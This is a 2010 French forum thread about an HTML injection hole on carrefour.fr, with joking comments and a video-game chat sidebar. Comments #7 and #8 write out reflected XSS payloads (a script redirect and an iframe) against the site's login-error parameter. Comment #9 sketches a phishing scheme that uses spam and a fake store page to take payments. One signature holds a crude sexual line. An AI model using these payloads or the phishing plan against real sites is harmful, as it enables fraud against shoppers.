l'asile.fr

5

Avec Carrefour, je positive

de SimOOn , le 30 mars 2010 à 20:51 - (carrefour.fr) - 10 commentaires
Hop, vous aussi faites de l'injection HTML excellente.

Proposer une brève

Détail des votes

Il y a 7 pour et 2 contre. Ce qui fait au total 9 votes.

À lire cette semaine...

groove_salad
#1 hOrny Lettuce

Ha ha, excellent !


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mardi
30 mars 2010, 20:56
 
 

stillcut
#2

Ma vue baisse ?


mardi
30 mars 2010, 22:10
 
 

bloute
#3

Installe linux.


mardi
30 mars 2010, 23:51
 
 

hohun
#4 Comique tripier

Hahaha


mercredi
31 mars 2010, 01:38
 
 

groove_salad
#5 hOrny Lettuce

.


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mercredi
31 mars 2010, 08:19
 
 

gwendal
#6 Détourageophile

Hahahaha :)


- les fautes
mercredi
31 mars 2010, 08:24
 
 

Kane
#7 Satan m'habite

Encore plus fort !

http://www.carrefour.fr/portal/site/carrefour/?loginerror=<script>windows.location.replace("www.lemonparty.org")</script>

Humf, la balise URL foire ...


mercredi
31 mars 2010, 09:24
 
 

Akshell
#8

[url]http://www.carrefour.fr/portal/site/carrefour/?loginerror=%3Ciframe%20src=%22http://www.lemonparty.org%22%20width=%22800%22%20height=%22600%22%3E%3C/iframe%3E[/url]


mercredi
31 mars 2010, 10:14
 
 

Kane
#9 Satan m'habite

haha ouai, la bonne vieille balise iframe!

Il y a moyen d'exploiter ça bien comme il faut : un bon gros SPAM avec un article en promo qui redirige vers la page en question. Sur cette page on fait afficher un faux site carrefour avec la vraie URL dans le navigateur.

Faut juste que l'utilisateur ne capte pas qu'il n'est pas en SSL au moment de payer.


mercredi
31 mars 2010, 10:38
 
 

Akshell
#10

sûrement avec un truc du genre opener.location.replace("www.lemonparty.org") dans l'iframe
j'ai pas trop envie de tester mais ça doit être possible en effet.


mercredi
31 mars 2010, 11:38
 
 


Ajouter un commentaire

Vous devez être identifié pour poster un commentaire.

# 19:44:26
(hohun) 15:24:24 et pas un bobo, franchement les gamins sont en mousse
# 15:24:24
(carwin) Ma région a du talent [url]
# 22:25:52
(plantmann) Sinon depuis quelques jours, j'ai attaqué X-com 2 : ben j'aime bien. Il est dur, mais pas injuste, et il est facile à prendre en main.
# 22:24:24
(plantmann) J'ai lâché à la mission dans le quartier englouti, on basculait trop de l'infiltration à l'action à mon goût (et moi j'aime surtout le côté "puzzle" de l'infiltration)
# 22:23:39
(plantmann) J'ai pas joué à Thief (j'en avais pourtant entendu plutôt du bien, mais il date effectivement) mais Dishonored m'a beaucoup plu, même si je ne l'ai pas fini
# 14:51:37
(Akshell) ça ne marche pas du tout.
# 14:51:27
(Akshell) ils ont voulu créer un "body awareness", le mouvement effectué s'adapte à la positon du perso, mais ce n'est pas très bien géré, tu te mets à couvert quand tu veux dash dans une ombre, tu te retrouve bloqué quand tu veux sauter dans le vide.
# 12:01:49
(hohun) 10:58:21 j'y ai joué récemment, et je l'ai lâché en cours de route, c'était pas mauvais mais passé les premières visites dans le monde on se lasse. C'était bizarrement lourdingue
# 10:58:21
(Akshell) J'ai commencé Thief, que j'avais préacheté en collector en 2014... bah, ouais la série était déjà morte totalement tuée par Dishonnored qui l'éclate sur tous les points.
# 20:09:11
(hohun) le club des boomers
lire la suite de la tribune